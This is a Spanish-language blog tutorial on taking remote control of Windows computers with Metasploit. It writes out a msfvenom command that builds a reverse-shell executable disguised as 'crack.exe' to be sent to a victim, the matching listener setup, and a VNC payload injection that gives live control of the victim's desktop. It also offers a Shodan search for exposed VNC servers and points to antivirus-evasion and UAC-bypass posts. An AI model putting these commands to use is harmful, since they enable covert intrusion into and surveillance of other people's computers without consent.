lunes, 19 de octubre de 2015

VNC Remote Connection all Windows Operating Metasploit



Saludos fieles lectores en este oportunidad aprenderemos a como controlar un ordenador remotamente mediante msfconsole o metasploit  mediante una inyeccion payload VNC (Virtual Network computing), cuya función es controlar remotamente el ordenador comprometido y monitorearlo en vivo.













Referencia: https://es.wikipedia.org/wiki/VNC


Si desean pueden auditar o entrar a un servidor VNC por defauld, les daré un dork en shoudan

https://www.shodan.io/search?query=vnc+port%3A5901

PRIMER ESCENARIO: EXPLOTACIÓN 


EL primero paso de obtener acceso  a un ordenador, seria comprometerlo remotamente mediante ataques remotos o infecciones mediante payloads, dejare algunos POST donde enseño algunas técnicas para realizar algunas explotaciones.

http://backtrack-omar.blogspot.pe/2015/10/beef-browser-exploitation-framework.html
http://backtrack-omar.blogspot.pe/2015/10/unicorn-la-herramienta-de-infeccion.html
http://backtrack-omar.blogspot.pe/2015/10/winrar-nuestro-viejo-aliado-de.html
http://backtrack-omar.blogspot.pe/2015/09/2015-flash-0day-exploit-hackingteam.html
http://backtrack-omar.blogspot.pe/2015/03/las-viejas-macros-siempre-en-accion.html
http://backtrack-omar.blogspot.pe/2014/01/aprendiendo-metasploit-avanzado.html

no obstante existen mas métodos de infección y explotación que mas adelante añadiré al blog, pero creo que estos de aquí, les ayudara de mucho, lo primero que haré sera crear un payload ejecutable mediante msfvenom:

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.179.129 LPORT=8080 -f exe > crack.exe


Luego de ello abriremos metasploit para activar nuestro servidor de escucha:

--------------------------------------------------------------------------------------------------------------------------
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.179.129
msf exploit(handler) > set lport 8080

msf exploit(handler) > exploit
--------------------------------------------------------------------------------------------------------------------------


el payload que hemos creado sera detectado por cualquier antivirus, si deseamos hacerlo indetectable pueden visitar mi siguiente POST:
http://backtrack-omar.blogspot.pe/2015/10/evadiendo-av-codificando-payloads-con.html

enviaremos el ejecutable a nuestra victima y solamente esperaremos a que la victima ejecute el archivo para tener acceso al sistema.

Para que puedan entenderlo una ves que tengamos acceso a un sistema tendremos la sesión de acuerdo al orden numero de cada conexión, como el primero se le otorga "session 1"

Lo que haremos sera tener acceso remoto para ello inyectaremos un payload que se enfoca en este proceso, pero antes saldremos de meterpreter, sin cerrar la sesión con el comando "background" para añadir el payload:

meterpreter > background
[*] Backgrounding session 1...

--------------------------------------------------------------------------------------------------------------------------
msf exploit(handler) > use windows/manage/payload_inject
msf post(payload_inject) > set HANDLER true
msf post(payload_inject) > set LHOST 192.168.179.129
msf post(payload_inject) > set PAYLOAD windows/vncinject/reverse_tcp
msf post(payload_inject) > set SESSION 1
msf post(payload_inject) > run
-------------------------------------------------------------------------------------------------------------------------

Si vemos la imagen no hay necesidad de explicar cada modulo que se ejecuta, ya que se simplifica solo, una ves cargada la conexión automáticamente tendremos el acceso de escritorio remoto:

Este escenario se ejecuto en windows 7 , de igual manera funciona en windows 8, 8.1 y 10 una clara prueba de ello, les mostrare una imagen comprometiendo a un 8.1.

con esto tiene acceso a controlar el ordenador, desde su sistema.
Espero sea de su agrado mis lectores, sin mas que decir espero les aya gustado y hayan aprendido algo nuevo gracias a este servidor.

Un Saludo !!

3 comentarios:

  1. omar que tal use metasploit desde windows puedo conectarme entrar al systema pero no puedo obtenerlo con getsystem y al momento de querer usar el background para tener una imagen de la pc donde use el shellter me sale un error y no me muestra nada eso tiene solucion? o es defecto del metasploit para windows

    ResponderEliminar
    Respuestas
    1. Metasploit en Windows tiene muchas fallas sobre ello, pero si no tienes permisos por getsystem es porque debes bypassear el "UAC"
      aqui dejo el POST sobre ello:

      Eliminar

Datos del Autor


Obra de K. Haring

Hola, mi nombre es omar soy estudiante de Ingenieria de sistemas en Perú. actualmente me estoy dedicando a dar ponencias sobre seguridad Informática.
Soy una persona sencilla y humilde que me encanta aprender nuevos temas en mis tiempos libres.


"Me considero un novato en busca de conocimiento"


Entradas Populares